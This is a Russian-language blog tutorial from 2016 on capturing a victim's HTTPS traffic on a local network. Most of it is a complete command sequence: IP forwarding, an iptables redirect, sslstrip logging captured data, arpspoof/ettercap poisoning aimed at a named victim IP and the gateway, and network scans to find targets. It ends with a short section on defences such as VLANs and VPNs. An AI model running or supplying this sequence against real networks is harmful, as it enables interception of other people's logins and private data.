12.12.2016 @ 13:40 ARP Spoofing: перехват HTTPS ARP spoofing, arpsoof, ettercap, sslstrip В продолжение темы о ARP Spoofing’е в данной статье рассмотрим перехват HTTPS. О том, что такое ARP Spoofing, речь шла в предыдущей статье, ознакомиться с которой вы можете здесь. Рассмотрим случай, когда жертва использует защищенное соединение и прослушивание трафика (например Wireshark’ом) не даёт никакого результата. Подготовка и проведение атаки. Для проведения атаки будем использовать Ubuntu 16.04. Используемые инструменты: ettercap или arpspoof sslstrip iptables Все инструменты имеются в штатных репозиториях. Идея состоит в следующем: выполняется подмена arp-таблицы для жертвы (ettercap или arpspoof), трафик перенаправляется (iptables) на sslstrip с целью замены https на http. Все команды выполняются от имени суперпользователя. В терминале: sudo su Для начала нам необходимо активировать ip forwarding для пропуска пакетов через нашу систему. Если этого не сделать, то после выполнения arp poisoning, пакеты, предназначенные для компьютера жертвы, будут успешно потеряны. Выполняем команду: echo 1 > /proc/sys/net/ipv4/ip_forward Сформируем правила для iptables, по которым приходящий трафик на порт 80 будет перенаправлен на sslstrip: iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 9999 Для таблицы nat цепочки PREROUTING в iptables создаётся правило, по которому все пакеты tcp:80 перенаправляются на порт 9999 (можно выбрать и любой другой порт в пределах 1024-65535). Запускаем sslstrip: sslstrip -l 9999 -w Logfile.txt Здесь указываем, что слушать необходимо порт 9999 и перехваченные данные записывать в Logfile.txt Выполняем ARP poisoning. В случае с arpspoof: arpspoof -t 192.168.1.43 192.168.1.1 192.168.1.43 — IP адрес жертвы 192.168.1.1 — IP адрес шлюза (шлюз можно узнать командой route) В случае с ettercap: ettercap -T -M arp -o /192.168.1.43// /192.168.1.1// -T — текстовый интерфейс -M arp — использование ARP MitM-атаки -o — использование ip forward ядром ОС, а не самой программой. Плюс использования ettercap в том, что её можно выполнять к любому количеству хостов в локальной сети. Если вы не знаете IP адрес жертвы, то можно просканировать локальную сеть: ettercap -T -s «lq» nmap -sP 192.168.1.0/24 У каждого метода сканирования сети свои плюсы и минусы, для точности лучше использовать оба. Результат. Стоит отметить, что данный метод работает не всегда. Причиной тому — использование браузером статического списка сайтов HSTS. Из других инструментов перехвата HTTPS трафика следует выделить bettercap и intercepter-ng. Защита от ARP Spoofing. Существует несколько способов защиты от ARP Spoofing, рассмотрим некоторые из них. Создание VLAN на коммутаторе На коммутаторе создаётся VLAN, в котором находятся только сам коммутатор и конкретное сетевое устройство. Создание шифрованных соединений (PPPoE, VPN и т.д.) Этот способ подходит и для общественных сетей, ведь весь трафик проходит в зашифрованном виде и перехватить какие-либо пользовательские данные становится невозможно. Заключение Таким образом, мы рассмотрели атаку ARP Spoofing в случае с HTTPS. Данный метод не позволяют полностью перехватывать весь трафик в открытом виде, а также защититься от которого сравнительно легко. 2S1one 17891 Network security Читать дальше >>